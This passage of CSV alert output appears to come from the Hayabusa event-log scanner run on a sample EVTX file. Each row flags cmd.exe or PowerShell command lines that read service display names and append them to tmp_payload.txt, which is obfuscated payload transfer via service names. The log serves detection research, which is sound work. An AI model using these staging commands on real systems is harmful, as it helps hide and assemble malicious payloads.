C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
